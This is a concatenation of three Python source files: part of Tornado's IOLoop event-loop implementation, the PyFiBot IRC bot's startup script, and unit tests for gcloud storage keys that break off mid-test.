return self.call_at(deadline, callback, *args, **kwargs)
elif isinstance(deadline, datetime.timedelta):
return self.call_at(self.time() + timedelta_to_seconds(deadline),
callback, *args, **kwargs)
else:
raise TypeError("Unsupported deadline %r" % deadline)
def call_later(self, delay, callback, *args, **kwargs):
"""Runs the ``callback`` after ``delay`` seconds have passed.
Returns an opaque handle that may be passed to `remove_timeout`
to cancel. Note that unlike the `asyncio` method of the same
name, the returned object does not have a ``cancel()`` method.
See `add_timeout` for comments on thread-safety and subclassing.
.. versionadded:: 4.0
"""
return self.call_at(self.time() + delay, callback, *args, **kwargs)
def call_at(self, when, callback, *args, **kwargs):
"""Runs the ``callback`` at the absolute time designated by ``when``.
``when`` must be a number using the same reference point as
`IOLoop.time`.
Returns an opaque handle that may be passed to `remove_timeout`
to cancel. Note that unlike the `asyncio` method of the same
name, the returned object does not have a ``cancel()`` method.
See `add_timeout` for comments on thread-safety and subclassing.
.. versionadded:: 4.0
"""
return self.add_timeout(when, callback, *args, **kwargs)
def remove_timeout(self, timeout):
"""Cancels a pending timeout.
The argument is a handle as returned by `add_timeout`. It is
safe to call `remove_timeout` even if the callback has already
been run.
"""
raise NotImplementedError()
def add_callback(self, callback, *args, **kwargs):
"""Calls the given callback on the next I/O loop iteration.
It is safe to call this method from any thread at any time,
except from a signal handler. Note that this is the **only**
method in `IOLoop` that makes this thread-safety guarantee; all
other interaction with the `IOLoop` must be done from that
`IOLoop`'s thread. `add_callback()` may be used to transfer
control from other threads to the `IOLoop`'s thread.
To add a callback from a signal handler, see
`add_callback_from_signal`.
"""
raise NotImplementedError()
def add_callback_from_signal(self, callback, *args, **kwargs):
"""Calls the given callback on the next I/O loop iteration.
Safe for use from a Python signal handler; should not be used
otherwise.
Callbacks added with this method will be run without any
`.stack_context`, to avoid picking up the context of the function
that was interrupted by the signal.
"""
raise NotImplementedError()
def spawn_callback(self, callback, *args, **kwargs):
"""Calls the given callback on the next IOLoop iteration.
Unlike all other callback-related methods on IOLoop,
``spawn_callback`` does not associate the callback with its caller's
``stack_context``, so it is suitable for fire-and-forget callbacks
that should not interfere with the caller.
.. versionadded:: 4.0
"""
with stack_context.NullContext():
self.add_callback(callback, *args, **kwargs)
def add_future(self, future, callback):
"""Schedules a callback on the ``IOLoop`` when the given
`.Future` is finished.
The callback is invoked with one argument, the
`.Future`.
"""
assert is_future(future)
callback = stack_context.wrap(callback)
future.add_done_callback(
lambda future: self.add_callback(callback, future))
def _run_callback(self, callback):
"""Runs a callback with error handling.
For use in subclasses.
"""
try:
ret = callback()
if ret is not None:
from tornado import gen
# Functions that return Futures typically swallow all
# exceptions and store them in the Future. If a Future
# makes it out to the IOLoop, ensure its exception (if any)
# gets logged too.
try:
ret = gen.convert_yielded(ret)
except gen.BadYieldError:
# It's not unusual for add_callback to be used with
# methods returning a non-None and non-yieldable
# result, which should just be ignored.
pass
else:
self.add_future(ret, self._discard_future_result)
except Exception:
self.handle_callback_exception(callback)
def _discard_future_result(self, future):
"""Avoid unhandled-exception warnings from spawned coroutines."""
future.result()
def handle_callback_exception(self, callback):
"""This method is called whenever a callback run by the `IOLoop`
throws an exception.
By default simply logs the exception as an error. Subclasses
may override this method to customize reporting of exceptions.
The exception itself is not passed explicitly, but is available
in `sys.exc_info`.
"""
app_log.error("Exception in callback %r", callback, exc_info=True)
def split_fd(self, fd):
"""Returns an (fd, obj) pair from an ``fd`` parameter.
We accept both raw file descriptors and file-like objects as
input to `add_handler` and related methods. When a file-like
object is passed, we must retain the object itself so we can
close it correctly when the `IOLoop` shuts down, but the
poller interfaces favor file descriptors (they will accept
file-like objects and call ``fileno()`` for you, but they
always return the descriptor itself).
This method is provided for use by `IOLoop` subclasses and should
not generally be used by application code.
.. versionadded:: 4.0
"""
try:
return fd.fileno(), fd
except AttributeError:
return fd, fd
def close_fd(self, fd):
"""Utility method to close an ``fd``.
If ``fd`` is a file-like object, we close it directly; otherwise
we use `os.close`.
This method is provided for use by `IOLoop` subclasses (in
implementations of ``IOLoop.close(all_fds=True)`` and should
not generally be used by application code.
.. versionadded:: 4.0
"""
try:
try:
fd.close()
except AttributeError:
os.close(fd)
except OSError:
pass
class PollIOLoop(IOLoop):
"""Base class for IOLoops built around a select-like function.
For concrete implementations, see `tornado.platform.epoll.EPollIOLoop`
(Linux), `tornado.platform.kqueue.KQueueIOLoop` (BSD and Mac), or
`tornado.platform.select.SelectIOLoop` (all platforms).
"""
def initialize(self, impl, time_func=None, **kwargs):
super(PollIOLoop, self).initialize(**kwargs)
self._impl = impl
if hasattr(self._impl, 'fileno'):
set_close_exec(self._impl.fileno())
self.time_func = time_func or time.time
self._handlers = {}
self._events = {}
self._callbacks = []
self._callback_lock = threading.Lock()
self._timeouts = []
self._cancellations = 0
self._running = False
self._stopped = False
self._closing = False
self._thread_ident = None
self._blocking_signal_threshold = None
self._timeout_counter = itertools.count()
# Create a pipe that we send bogus data to when we want to wake
# the I/O loop when it is idle
self._waker = Waker()
self.add_handler(self._waker.fileno(),
lambda fd, events: self._waker.consume(),
self.READ)
def close(self, all_fds=False):
with self._callback_lock:
self._closing = True
self.remove_handler(self._waker.fileno())
if all_fds:
for fd, handler in self._handlers.values():
self.close_fd(fd)
self._waker.close()
self._impl.close()
self._callbacks = None
self._timeouts = None
def add_handler(self, fd, handler, events):
fd, obj = self.split_fd(fd)
self._handlers[fd] = (obj, stack_context.wrap(handler))
self._impl.register(fd, events | self.ERROR)
def update_handler(self, fd, events):
fd, obj = self.split_fd(fd)
self._impl.modify(fd, events | self.ERROR)
def remove_handler(self, fd):
fd, obj = self.split_fd(fd)
self._handlers.pop(fd, None)
self._events.pop(fd, None)
try:
self._impl.unregister(fd)
except Exception:
gen_log.debug("Error deleting fd from IOLoop", exc_info=True)
def set_blocking_signal_threshold(self, seconds, action):
if not hasattr(signal, "setitimer"):
gen_log.error("set_blocking_signal_threshold requires a signal module "
"with the setitimer method")
return
self._blocking_signal_threshold = seconds
if seconds is not None:
signal.signal(signal.SIGALRM,
action if action is not None else signal.SIG_DFL)
def start(self):
if self._running:
raise RuntimeError("IOLoop is already running")
self._setup_logging()
if self._stopped:
self._stopped = False
return
old_current = getattr(IOLoop._current, "instance", None)
IOLoop._current.instance = self
self._thread_ident = thread.get_ident()
self._running = True
# signal.set_wakeup_fd closes a race condition in event loops:
# a signal may arrive at the beginning of select/poll/etc
# before it goes into its interruptible sleep, so the signal
# will be consumed without waking the select. The solution is
# for the (C, synchronous) signal handler to write to a pipe,
# which will then be seen by select.
#
# In python's signal handling semantics, this only matters on the
# main thread (fortunately, set_wakeup_fd only works on the main
# thread and will raise a ValueError otherwise).
#
# If someone has already set a wakeup fd, we don't want to
# disturb it. This is an issue for twisted, which does its
# SIGCHLD processing in response to its own wakeup fd being
# written to. As long as the wakeup fd is registered on the IOLoop,
# the loop will still wake up and everything should work.
old_wakeup_fd = None
if hasattr(signal, 'set_wakeup_fd') and os.name == 'posix':
# requires python 2.6+, unix. set_wakeup_fd exists but crashes
# the python process on windows.
try:
old_wakeup_fd = signal.set_wakeup_fd(self._waker.write_fileno())
if old_wakeup_fd != -1:
# Already set, restore previous value. This is a little racy,
# but there's no clean get_wakeup_fd and in real use the
# IOLoop is just started once at the beginning.
signal.set_wakeup_fd(old_wakeup_fd)
old_wakeup_fd = None
except ValueError:
# Non-main thread, or the previous value of wakeup_fd
# is no longer valid.
old_wakeup_fd = None
try:
while True:
# Prevent IO event starvation by delaying new callbacks
# to the next iteration of the event loop.
with self._callback_lock:
callbacks = self._callbacks
self._callbacks = []
# Add any timeouts that have come due to the callback list.
# Do not run anything until we have determined which ones
# are ready, so timeouts that call add_timeout cannot
# schedule anything in this iteration.
due_timeouts = []
if self._timeouts:
now = self.time()
while self._timeouts:
if self._timeouts[0].callback is None:
# The timeout was cancelled. Note that the
# cancellation check is repeated below for timeouts
# that are cancelled by another timeout or callback.
heapq.heappop(self._timeouts)
self._cancellations -= 1
elif self._timeouts[0].deadline <= now:
due_timeouts.append(heapq.heappop(self._timeouts))
else:
break
if (self._cancellations > 512 and
self._cancellations > (len(self._timeouts) >> 1)):
# Clean up the timeout queue when it gets large and it's
# more than half cancellations.
self._cancellations = 0
self._timeouts = [x for x in self._timeouts
if x.callback is not None]
heapq.heapify(self._timeouts)
for callback in callbacks:
self._run_callback(callback)
for timeout in due_timeouts:
if timeout.callback is not None:
self._run_callback(timeout.callback)
# Closures may be holding on to a lot of memory, so allow
# them to be freed before we go into our poll wait.
callbacks = callback = due_timeouts = timeout = None
if self._callbacks:
# If any callbacks or timeouts called add_callback,
# we don't want to wait in poll() before we run them.
poll_timeout = 0.0
elif self._timeouts:
# If there are any timeouts, schedule the first one.
# Use self.time() instead of 'now' to account for time
# spent running callbacks.
poll_timeout = self._timeouts[0].deadline - self.time()
poll_timeout = max(0, min(poll_timeout, _POLL_TIMEOUT))
else:
# No timeouts and no callbacks, so use the default.
poll_timeout = _POLL_TIMEOUT
if not self._running:
break
if self._blocking_signal_threshold is not None:
# clear alarm so it doesn't fire while poll is waiting for
# events.
signal.setitimer(signal.ITIMER_REAL, 0, 0)
try:
event_pairs = self._impl.poll(poll_timeout)
except Exception as e:
# Depending on python version and IOLoop implementation,
# different exception types may be thrown and there are
# two ways EINTR might be signaled:
# * e.errno == errno.EINTR
# * e.args is like (errno.EINTR, 'Interrupted system call')
if errno_from_exception(e) == errno.EINTR:
continue
else:
raise
if self._blocking_signal_threshold is not None:
signal.setitimer(signal.ITIMER_REAL,
self._blocking_signal_threshold, 0)
# Pop one fd at a time from the set of pending fds and run
# its handler. Since that handler may perform actions on
# other file descriptors, there may be reentrant calls to
# this IOLoop that modify self._events
self._events.update(event_pairs)
while self._events:
fd, events = self._events.popitem()
try:
fd_obj, handler_func = self._handlers[fd]
handler_func(fd_obj, events)
except (OSError, IOError) as e:
if errno_from_exception(e) == errno.EPIPE:
# Happens when the client closes the connection
pass
else:
self.handle_callback_exception(self._handlers.get(fd))
except Exception:
self.handle_callback_exception(self._handlers.get(fd))
fd_obj = handler_func = None
finally:
# reset the stopped flag so another start/stop pair can be issued
self._stopped = False
if self._blocking_signal_threshold is not None:
signal.setitimer(signal.ITIMER_REAL, 0, 0)
IOLoop._current.instance = old_current
if old_wakeup_fd is not None:
signal.set_wakeup_fd(old_wakeup_fd)
def stop(self):
self._running = False
self._stopped = True
self._waker.wake()
def time(self):
return self.time_func()
def call_at(self, deadline, callback, *args, **kwargs):
timeout = _Timeout(
deadline,
functools.partial(stack_context.wrap(callback), *args, **kwargs),
self)
heapq.heappush(self._timeouts, timeout)
return timeout
def remove_timeout(self, timeout):
# Removing from a heap is complicated, so just leave the defunct
# timeout object in the queue (see discussion in
# http://docs.python.org/library/heapq.html).
# If this turns out to be a problem, we could add a garbage
# collection pass whenever there are too many dead timeouts.
timeout.callback = None
self._cancellations += 1
def add_callback(self, callback, *args, **kwargs):
if thread.get_ident() != self._thread_ident:
# If we're not on the IOLoop's thread, we need to synchronize
# with other threads, or waking logic will induce a race.
with self._callback_lock:
if self._closing:
return
list_empty = not self._callbacks
self._callbacks.append(functools.partial(
stack_context.wrap(callback), *args, **kwargs))
if list_empty:
# If we're not in the IOLoop's thread, and we added the
# first callback to an empty list, we may need to wake it
# up (it may wake up on its own, but an occasional extra
# wake is harmless). Waking up a polling IOLoop is
# relatively expensive, so we try to avoid it when we can.
self._waker.wake()
else:
if self._closing:
return
# If we're on the IOLoop's thread, we don't need the lock,
# since we don't need to wake anyone, just add the
# callback. Blindly insert into self._callbacks. This is
# safe even from signal handlers because the GIL makes
# list.append atomic. One subtlety is that if the signal
# is interrupting another thread holding the
# _callback_lock block in IOLoop.start, we may modify
# either the old or new version of self._callbacks, but
# either way will work.
self._callbacks.append(functools.partial(
stack_context.wrap(callback), *args, **kwargs))
def add_callback_from_signal(self, callback, *args, **kwargs):
with stack_context.NullContext():
self.add_callback(callback, *args, **kwargs)
class _Timeout(object):
"""An IOLoop timeout, a UNIX timestamp and a callback"""
# Reduce memory overhead when there are lots of pending callbacks
__slots__ = ['deadline', 'callback', 'tdeadline']
def __init__(self, deadline, callback, io_loop):
if not isinstance(deadline, numbers.Real):
raise TypeError("Unsupported deadline %r" % deadline)
self.deadline = deadline
self.callback = callback
self.tdeadline = (deadline, next(io_loop._timeout_counter))
# Comparison methods to sort by deadline, with object id as a tiebreaker
# to guarantee a consistent ordering. The heapq module uses __le__
# in python2.5, and __lt__ in 2.6+ (sort() and most other comparisons
# use __lt__).
def __lt__(self, other):
return self.tdeadline < other.tdeadline
def __le__(self, other):
return self.tdeadline <= other.tdeadline
class PeriodicCallback(object):
"""Schedules the given callback to be called periodically.
The callback is called every ``callback_time`` milliseconds.
Note that the timeout is given in milliseconds, while most other
time-related functions in Tornado use seconds.
If the callback runs for longer than ``callback_time`` milliseconds,
subsequent invocations will be skipped to get back on schedule.
`start` must be called after the `PeriodicCallback` is created.
.. versionchanged:: 4.1
The ``io_loop`` argument is deprecated.
"""
def __init__(self, callback, callback_time, io_loop=None):
self.callback = callback
if callback_time <= 0:
raise ValueError("Periodic callback must have a positive callback_time")
self.callback_time = callback_time
self.io_loop = io_loop or IOLoop.current()
self._running = False
self._timeout = None
def start(self):
"""Starts the timer."""
self._running = True
self._next_timeout = self.io_loop.time()
self._schedule_next()
def stop(self):
"""Stops the timer."""
self._running = False
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
def is_running(self):
"""Return True if this `.PeriodicCallback` has been started.
.. versionadded:: 4.1
"""
return self._running
def _run(self):
if not self._running:
return
try:
return self.callback()
except Exception:
self.io_loop.handle_callback_exception(self.callback)
finally:
self._schedule_next()
def _schedule_next(self):
if self._running:
current_time = self.io_loop.time()
if self._next_timeout <= current_time:
callback_time_sec = self.callback_time / 1000.0
self._next_timeout += (math.floor((current_time - self._next_timeout) /
callback_time_sec) + 1) * callback_time_sec
self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
A modular python bot based on the twisted matrix irc library
@author Riku 'Shrike' Lindblad (shrike@addiktit.net)
@copyright Copyright (c) 2006 Riku Lindblad
@license New-Style BSD
"""
import re
import sys
import os.path
import time
import urllib
import fnmatch
import HTMLParser
import logging
import logging.handlers
try:
import psyco
psyco.full()
except ImportError:
print "Psyco not found, running unoptimized"
try:
import yaml
except ImportError:
print "PyYAML not found, please install from http://pyyaml.org/wiki/PyYAML"
sys.exit(1)
# twisted imports
try:
from twisted.words.protocols import irc
from twisted.internet import reactor, protocol, threads, defer
from twisted.python import rebuild
except ImportError:
print "Twisted library not found, please install Twisted from http://twistedmatrix.com/products/download"
sys.exit(1)
from util import *
from util.BeautifulSoup import BeautifulSoup
from util.BeautifulSoup import UnicodeDammit
# default timeout for socket connections
import socket
socket.setdefaulttimeout(20)
import botcore
log = logging.getLogger('core')
class URLCacheItem(object):
"""URL cache item object, fetches data only when needed"""
def __init__(self, url):
self.url = url
self.content = None
self.headers = None
self.bs = None
# maximum size in kB to download
self.max_size = 2048
self.fp = None
def _open(self, url):
"""Returns the raw file pointer to the given URL"""
if not self.fp:
urllib._urlopener = BotURLOpener()
try:
self.fp = urllib.urlopen(self.url)
except IOError, e:
log.warn("IOError when opening url %s" % url)
return self.fp
def _checkstatus(self):
"""Check if all data has already been cached and close socket if so"""
if self.content and \
self.headers and \
self.bs:
self.fp.close()
def getSize(self):
"""Get the content length of URL in kB
@return None if the server doesn't return a content-length header"""
if self.getHeaders().has_key('content-length'):
length = int(self.getHeaders()['content-length'])/1024
return length
else:
return None
def getContent(self):
"""Get the actual file at the URL
@return None if the file is too large (over 2MB)"""
if not self.content:
f = self._open(self.url)
size = self.getSize()
if size > self.max_size:
log.warn("CONTENT TOO LARGE, WILL NOT FETCH %s %s" % (size, self.url))
self.content = None
else:
if self.checkType():
self.content = UnicodeDammit(f.read()).unicode
else:
type = self.getHeaders().getsubtype()
log.warn("WRONG CONTENT TYPE, WILL NOT FETCH %s, %s, %s" % (size, type, self.url))
self._checkstatus()
return self.content
def getHeaders(self):
"""Get headers for the URL"""
if not self.headers:
f = self._open(self.url)
if f:
self.headers = f.info()
else:
self.headers = {}
self._checkstatus()
return self.headers
def checkType(self):
if self.getHeaders().getsubtype() in ['html', 'xml', 'xhtml+xml', 'atom+xml']:
return True
else:
return False
def getBS(self):
"""Get a beautifulsoup instance for the URL
@return None if the url doesn't contain HTML
"""
if not self.bs:
# only attempt a bs parsing if the content is html, xml or xhtml
if self.getHeaders().has_key('content-type') and \
self.getHeaders().getsubtype() in ['html', 'xml', 'xhtml+xml', 'atom+xml']:
try:
bs = BeautifulSoup(markup=self.getContent())
except HTMLParser.HTMLParseError:
log.warn("BS unable to parse content")
return None
self.bs = bs
else:
return None
self._checkstatus()
return self.bs
class BotURLOpener(urllib.FancyURLopener):
"""URL opener that fakes itself as Firefox and ignores all basic auth prompts"""
def __init__(self, *args):
# Firefox 1.0PR on w2k
self.version = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/6.0.408.1 Safari/534.0"
urllib.FancyURLopener.__init__(self, *args)
def prompt_user_passwd(self, host, realm):
log.info("PASSWORD PROMPT:", host, realm)
return ('', '')
class Network:
def __init__(self, root, alias, address, nickname, password, realname, channels = None):
self.alias = alias # network name
self.address = address # server address
self.nickname = nickname # nick to use
self.password = password
self.realname = realname # nick to use
self.channels = channels or {} # channels to join
# create network specific save directory
p = os.path.join(root, alias)
if not os.path.isdir(p):
os.mkdir(p)
def __repr__(self):
return 'Network(%r, %r)' % (self.alias, self.address)
class InstantDisconnectProtocol(protocol.Protocol):
def connectionMade(self):
self.transport.loseConnection()
class ThrottledClientFactory(protocol.ClientFactory):
"""Client factory that inserts a slight delay to connecting and reconnecting"""
lostDelay = 10
failedDelay = 60
def clientConnectionLost(self, connector, reason):
#print connector
log.info("connection lost (%s): reconnecting in %d seconds" % (reason, self.lostDelay))
reactor.callLater(self.lostDelay, connector.connect)
def clientConnectionFailed(self, connector, reason):
#print connector
log.info("connection failed (%s): reconnecting in %d seconds" % (reason, self.failedDelay))
reactor.callLater(self.failedDelay, connector.connect)
class PyFiBotFactory(ThrottledClientFactory):
"""python.fi bot factory"""
version = "20091115.0"
protocol = botcore.PyFiBot
allBots = None
moduledir = os.path.join(sys.path[0], "modules/")
startTime = None
config = None
def __init__(self, config):
"""Initialize the factory"""
self.config = config
self.data = {}
self.data['networks'] = {}
self.ns = {}
# cache url contents for 5 minutes, check for old entries every minute
self._urlcache = timeoutdict.TimeoutDict(timeout=300, pollinterval=60)
if not os.path.exists("data"):
os.mkdir("data")
def startFactory(self):
self.allBots = {}
self.starttime = time.time()
self._loadmodules()
ThrottledClientFactory.startFactory(self)
log.info("factory started")
def stopFactory(self):
del self.allBots
#self.data.close()
ThrottledClientFactory.stopFactory(self)
log.info("factory stopped")
reactor.stop()
def buildProtocol(self, address):
if re.match("[^a-z]+", address.host):
log.error("Kludge fix for twisted.words weirdness")
fqdn = socket.getfqdn(address.host)
address = (fqdn, address.port)
else:
address = (address.host, address.port)
# do we know how to connect to the given address?
for n in self.data['networks'].values():
# a server can have multiple DNS CNAME records (like irc.freenode.net)
aliases = socket.getaddrinfo(n.address[0], n.address[1], socket.AF_INET, socket.SOCK_STREAM)
# alias is a tupel: (family, socktype, proto, canonname, sockaddr)
aliases = [a[4][0] for a in aliases]
if socket.gethostbyname(address[0]) in aliases:
break
else:
log.info("unknown network address: " + repr(address))
return InstantDisconnectProtocol()
p = self.protocol(n)
self.allBots[n.alias] = p
p.factory = self
return p
def createNetwork(self, address, alias, nickname, password, realname, channels = None):
self.setNetwork(Network("data", alias, address, nickname, password, realname, channels))
def setNetwork(self, net):
nets = self.data['networks']
nets[net.alias] = net
self.data['networks'] = nets
def clientConnectionLost(self, connector, reason):
"""Connection lost for some reason"""
log.info("connection to %s lost" % str(connector.getDestination().host))
# find bot that connects to the address that just disconnected
for n in self.data['networks'].values():
dest = connector.getDestination()
if (dest.host, dest.port) == n.address:
if self.allBots.has_key(n.alias):
# did we quit intentionally?
if not self.allBots[n.alias].hasQuit:
# nope, reconnect
ThrottledClientFactory.clientConnectionLost(self, connector, reason)
del self.allBots[n.alias]
return
else:
log.info("No active connection to known network %s" % n.address[0])
def _finalize_modules(self):
"""Call all module finalizers"""
for module in self._findmodules():
# if rehashing (module already in namespace), finalize the old instance first
if self.ns.has_key(module):
if self.ns[module][0].has_key('finalize'):
log.info("finalize - %s" % module)
self.ns[module][0]['finalize']()
def _loadmodules(self):
"""Load all modules"""
self._finalize_modules()
for module in self._findmodules():
env = self._getGlobals()
log.info("load module - %s" % module)
# Load new version of the module
execfile(os.path.join(self.moduledir, module), env, env)
# initialize module
if env.has_key('init'):
log.info("initialize module - %s" % module)
env['init'](self.config)
# add to namespace so we can find it later
self.ns[module] = (env, env)
def _findmodules(self):
"""Find all modules"""
modules = [m for m in os.listdir(self.moduledir) if m.startswith("module_") and m.endswith(".py")]
return modules
def _getGlobals(self):
"""Global methods for modules"""
g = {}
g['getUrl'] = self.getUrl
g['getNick'] = self.getNick
g['isAdmin'] = self.isAdmin
g['isIgnored'] = self.isIgnored
return g
def getUrl(self, url, nocache=False):
"""Gets data, bs and headers for the given url, using the internal cache if necessary"""
if self._urlcache.has_key(url) and not nocache:
log.info("cache hit : %s" % url)
else:
if nocache:
log.info("cache pass: %s" % url)
else:
log.info("cache miss: %s" % url)
self._urlcache[url] = URLCacheItem(url)
return self._urlcache[url]
def getNick(self, user):
"""Parses nick from nick!user@host
@type user: string
@param user: nick!user@host
@return: nick"""
return user.split('!', 1)[0]
def isAdmin(self, user):
"""Check if an user has admin privileges.
@return: True or False"""
for pattern in self.config['admins']:
if fnmatch.fnmatch(user, pattern):
return True
return False
def isIgnored(self, user):
"""Check if an user is ignored
@return: True or False"""
if self.config.has_key('ignores'):
for pattern in self.config['ignores']:
if fnmatch.fnmatch(user, pattern):
return True
return False
def create_example_conf():
"""Create an example configuration file"""
conf = """
nick: botnick
realname: https://github.com/nigeljonez/newpyfibot
bindip: 0.0.0.0
admins:
- 'foo!bar@example.com'
ignores:
- 'bar!foo@example.com'
networks:
ircnet:
server: irc.ircnet.com
channels:
- mychannel
quakenet:
server: irc.quakenet.org
authname: name
authpass: password
channels:
- (mysecret, password)
"""
examplefile = 'bot.config.example'
if os.path.exists(examplefile):
return False
else:
f = file(examplefile, 'w')
yaml.dump(yaml.load(conf), f, default_flow_style=False)
f.close()
return True
def init_logging():
filename = os.path.join(sys.path[0], 'pyfibot.log')
# get root logger
logger = logging.getLogger()
if False:
handler = logging.handlers.RotatingFileHandler(filename, maxBytes=5000*1024, backupCount=20)
else:
handler = logging.StreamHandler()
# time format is same format of strftime
formatter = logging.Formatter('%(asctime)-15s %(levelname)-8s %(name)-11s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
if __name__ == '__main__':
init_logging()
sys.path.append(os.path.join(sys.path[0], 'lib'))
config = os.path.join(sys.path[0], "bot.config")
if os.path.exists(config):
config = yaml.load(file(config))
else:
if create_example_conf():
print "No config file found, I created an example config (bot.config.example) for you. Please edit it and rename to bot.config."
else:
print 'No config file found, there is an example config (bot.config.example) for you. Please edit it and rename to bot.config or delete it to generate a new example config.'
sys.exit(1)
if config.has_key('bindip'):
bindip = config['bindip']
else:
bindip = "0.0.0.0"
factory = PyFiBotFactory(config)
for network, settings in config['networks'].items():
# use network specific nick or realname if one has been configured
if settings.has_key('nick'):
nick = settings['nick']
elif config.has_key('nick'):
nick = config['nick']
else:
nick = "pyfibot"
if settings.has_key('password'):
password = settings['password']
else:
password = None
if settings.has_key('realname'):
realname = settings['realname']
elif config.has_key('realname'):
realname = config['realname']
else:
realname = "http://code.google.com/p/pyfibot/"
# prevent internal confusion with channels
chanlist = []
for channel in settings['channels']:
if channel[0] not in '&#!+^': channel = '#' + channel
# The following is to get around an annoying yaml/freenode thing w/ ## channels
chanlist.append(re.sub('\^', '#', channel))
port = 6667
try:
port = int(settings.get('port'))
except:
pass
factory.createNetwork((settings['server'], port), network, nick, password, realname, chanlist)
reactor.connectTCP(settings['server'], port, factory, bindAddress=(bindip, 0))
reactor.run()
|
|
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class Test_Key(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.storage.key import Key
return Key
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
key = self._makeOne()
self.assertEqual(key.bucket, None)
self.assertEqual(key.connection, None)
self.assertEqual(key.name, None)
self.assertEqual(key._properties, {})
self.assertTrue(key._acl is None)
def test_ctor_explicit(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
properties = {'key': 'value'}
key = self._makeOne(bucket, KEY, properties)
self.assertTrue(key.bucket is bucket)
self.assertTrue(key.connection is connection)
self.assertEqual(key.name, KEY)
self.assertEqual(key.properties, properties)
self.assertTrue(key._acl is None)
def test_from_dict_defaults(self):
KEY = 'key'
properties = {'key': 'value', 'name': KEY}
klass = self._getTargetClass()
key = klass.from_dict(properties)
self.assertEqual(key.bucket, None)
self.assertEqual(key.connection, None)
self.assertEqual(key.name, KEY)
self.assertEqual(key.properties, properties)
self.assertTrue(key._acl is None)
def test_from_dict_explicit(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
properties = {'key': 'value', 'name': KEY}
klass = self._getTargetClass()
key = klass.from_dict(properties, bucket)
self.assertTrue(key.bucket is bucket)
self.assertTrue(key.connection is connection)
self.assertEqual(key.name, KEY)
self.assertEqual(key.properties, properties)
self.assertTrue(key._acl is None)
def test_acl_property(self):
from gcloud.storage.acl import ObjectACL
key = self._makeOne()
acl = key.acl
self.assertTrue(isinstance(acl, ObjectACL))
self.assertTrue(acl is key._acl)
def test_path_no_bucket(self):
key = self._makeOne()
self.assertRaises(ValueError, getattr, key, 'path')
def test_path_no_name(self):
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket)
self.assertRaises(ValueError, getattr, key, 'path')
def test_path_normal(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.path, '/b/name/o/%s' % KEY)
def test_path_w_slash_in_name(self):
KEY = 'parent/child'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.path, '/b/name/o/parent%2Fchild')
def test_public_url(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.public_url,
'http://commondatastorage.googleapis.com/name/%s' %
KEY)
def test_public_url_w_slash_in_name(self):
KEY = 'parent/child'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(
key.public_url,
'http://commondatastorage.googleapis.com/name/parent%2Fchild')
def test_generate_signed_url_w_default_method(self):
KEY = 'key'
EXPIRATION = '2014-10-16T20:34:37Z'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.generate_signed_url(EXPIRATION),
'http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=2014-10-16T20:34:37Z')
self.assertEqual(connection._signed,
[('/name/key', EXPIRATION, {'method': 'GET'})])
def test_generate_signed_url_w_slash_in_name(self):
KEY = 'parent/child'
EXPIRATION = '2014-10-16T20:34:37Z'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.generate_signed_url(EXPIRATION),
'http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=2014-10-16T20:34:37Z')
self.assertEqual(connection._signed,
[('/name/parent%2Fchild',
EXPIRATION, {'method': 'GET'})])
def test_generate_signed_url_w_explicit_method(self):
KEY = 'key'
EXPIRATION = '2014-10-16T20:34:37Z'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
self.assertEqual(key.generate_signed_url(EXPIRATION, method='POST'),
'http://example.com/abucket/akey?Signature=DEADBEEF'
'&Expiration=2014-10-16T20:34:37Z')
self.assertEqual(connection._signed,
[('/name/key', EXPIRATION, {'method': 'POST'})])
def test_exists_miss(self):
NONESUCH = 'nonesuch'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, NONESUCH)
self.assertFalse(key.exists())
def test_exists_hit(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
bucket._keys[KEY] = 1
self.assertTrue(key.exists())
def test_rename(self):
KEY = 'key'
NEW_NAME = 'new-name'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
bucket._keys[KEY] = 1
new_key = key.rename(NEW_NAME)
self.assertEqual(key.name, KEY)
self.assertEqual(new_key.name, NEW_NAME)
self.assertFalse(KEY in bucket._keys)
self.assertTrue(KEY in bucket._deleted)
self.assertTrue(NEW_NAME in bucket._keys)
def test_delete(self):
KEY = 'key'
connection = _Connection()
bucket = _Bucket(connection)
key = self._makeOne(bucket, KEY)
bucket._keys[KEY] = 1
key.delete()
self.assertFalse(key.exists())
def test_download_to_file(self):
import httplib
from StringIO import StringIO
KEY = 'key'
chunk1_response = {'status': httplib.PARTIAL_CONTENT,
